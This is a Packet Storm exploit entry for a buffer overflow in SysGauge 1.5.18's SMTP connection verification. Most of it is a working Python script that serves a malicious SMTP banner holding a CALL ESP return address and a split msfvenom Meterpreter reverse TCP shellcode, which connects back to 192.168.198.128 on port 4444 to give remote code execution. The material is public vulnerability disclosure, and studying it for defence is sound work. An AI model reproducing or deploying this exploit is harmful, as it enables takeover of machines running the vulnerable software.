SysGauge 1.5.18 Buffer Overflow

2017-03-01T00:00:00
ID PACKETSTORM:141392
Type packetstorm
Reporter Peter Baris
Modified 2017-03-01T00:00:00

Description

                                        
                                            `# Exploit Title: SysGauge 1.5.18 a buffer overflow in SMTP connection verification function leads to code execution  
# Date: 2017-02-28  
# Exploit Author: Peter Baris  
# Vendor Homepage: http://www.saptech-erp.com.au  
# Software Link: http://www.sysgauge.com/setups/sysgauge_setup_v1.5.18.exe  
# Version: 1.5.18  
# Tested on: Windows Server 2008 R2 Standard x64  
# CVE : requested  
  
# The shellcode has to be split into 2 pieces for the exploit to work and has to be placed at the offsets like shown below.  
# The 1st part can be max. 236 bytes   
# The 2nd part can be max. 76 (leave at least 4 NOPs)  
  
  
import socket  
  
# QtGui4.dll 0x6527635E - CALL ESP  
jmp = "\x5e\x63\x27\x65"  
nops = "\x90"*8  
  
  
# reverse meterpreter shell 306 bytes long bad chars \x00\x0a\x0b\x20   
#IP: 192.168.198.128, PORT: 4444  
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.198.128 LPORT=4444 -f c -b \x00\x0a\x0d\x20 --smallest  
  
rev_met_1=("\x6a\x47\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1f\x2d"  
"\x97\x97\x83\xeb\xfc\xe2\xf4\xe3\xc5\x15\x97\x1f\x2d\xf7\x1e"  
"\xfa\x1c\x57\xf3\x94\x7d\xa7\x1c\x4d\x21\x1c\xc5\x0b\xa6\xe5"  
"\xbf\x10\x9a\xdd\xb1\x2e\xd2\x3b\xab\x7e\x51\x95\xbb\x3f\xec"  
"\x58\x9a\x1e\xea\x75\x65\x4d\x7a\x1c\xc5\x0f\xa6\xdd\xab\x94"  
"\x61\x86\xef\xfc\x65\x96\x46\x4e\xa6\xce\xb7\x1e\xfe\x1c\xde"  
"\x07\xce\xad\xde\x94\x19\x1c\x96\xc9\x1c\x68\x3b\xde\xe2\x9a"  
"\x96\xd8\x15\x77\xe2\xe9\x2e\xea\x6f\x24\x50\xb3\xe2\xfb\x75"  
"\x1c\xcf\x3b\x2c\x44\xf1\x94\x21\xdc\x1c\x47\x31\x96\x44\x94"  
"\x29\x1c\x96\xcf\xa4\xd3\xb3\x3b\x76\xcc\xf6\x46\x77\xc6\x68"  
"\xff\x72\xc8\xcd\x94\x3f\x7c\x1a\x42\x45\xa4\xa5\x1f\x2d\xff"  
"\xe0\x6c\x1f\xc8\xc3\x77\x61\xe0\xb1\x18\xd2\x42\x2f\x8f\x2c"  
"\x97\x97\x36\xe9\xc3\xc7\x77\x04\x17\xfc\x1f\xd2\x42\xfd\x1a"  
"\x45\x57\x3f\xd9\xad\xff\x95\x1f\x3c\xcb\x1e\xf9\x7d\xc7\xc7"  
"\x4f\x6d\xc7\xd7\x4f\x45\x7d\x98\xc0\xcd\x68\x42\x88\x47\x87"  
"\xc1\x48\x45\x0e\x32\x6b\x4c")  
  
  
rev_met_2=("\x68\x42\x9a\xed\xe3\x9b\xe0\x63"  
"\x9f\xe2\xf3\x45\x67\x22\xbd\x7b\x68\x42\x75\x2d\xfd\x93\x49"  
"\x7a\xff\x95\xc6\xe5\xc8\x68\xca\xa6\xa1\xfd\x5f\x45\x97\x87"  
"\x1f\x2d\xc1\xfd\x1f\x45\xcf\x33\x4c\xc8\x68\x42\x8c\x7e\xfd"  
"\x97\x49\x7e\xc0\xff\x1d\xf4\x5f\xc8\xe0\xf8\x96\x54\x36\xeb"  
"\xe2\x79\xdc\x2d\x97\x97")  
  
  
buffer = "A"*176+rev_met_2+"A"*2+jmp+"B"*12+nops+rev_met_1  
port = 25  
s = socket.socket()  
ip = '0.0.0.0'   
s.bind((ip, port))   
s.listen(5)   
  
  
print 'Listening on SMTP port: '+str(port)  
print(len(rev_met_1))  
print(len(rev_met_2))  
  
while True:  
conn, addr = s.accept()   
conn.send('220 '+buffer+'ESMTP Sendmail \r\n')  
conn.close()  
  
`